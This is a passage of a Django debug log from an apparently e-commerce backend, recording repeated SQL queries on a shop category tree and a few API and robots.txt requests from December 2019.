"shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:16:38,846 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:16:38,848 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:16:38,851 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:16:38,854 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:16:38,861 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:16:38,865 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:16:38,867 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:16:38,870 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:16:38,870 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:16:38,875 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:16:38,878 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:16:38,881 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) [16/Dec/2019 07:16:38] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:16:38,884 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:16:38,887 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:16:38,889 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:16:38,891 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:16:38,893 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:16:38,897 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:16:38,899 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:16:38,902 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:16:38,904 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:16:38,907 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:16:38,909 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:16:38,912 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:16:38,915 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:16:38,917 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:16:38,920 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:16:38,922 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:16:38] "GET /api/v1/categories/ HTTP/1.0" 200 15396 Not Found: /robots.txt [16/Dec/2019 07:17:14] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-16 07:17:14,775 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:17:14,783 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:17:14,787 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:17:14,790 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:17:14,795 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:17:14,798 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:17:14,800 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:17:14,802 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:17:14,804 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:17:14,808 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:17:14,810 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:17:14,812 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:17:14,814 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:17:14,817 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:17:14,820 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:17:14,822 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:17:14,824 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:17:14,826 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:17:14,829 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:17:14,832 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:17:14,834 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:17:14,836 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:17:14,839 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:17:14,841 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:17:14,843 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:17:14,846 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:17:14,848 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:17:14,851 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:17:14,853 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:17:14,856 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:17:14,859 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:17:14,862 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:17:14,864 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:17:14,866 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:17:14,869 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:17:14,873 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:17:14,875 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:17:14,877 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:17:14,880 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, 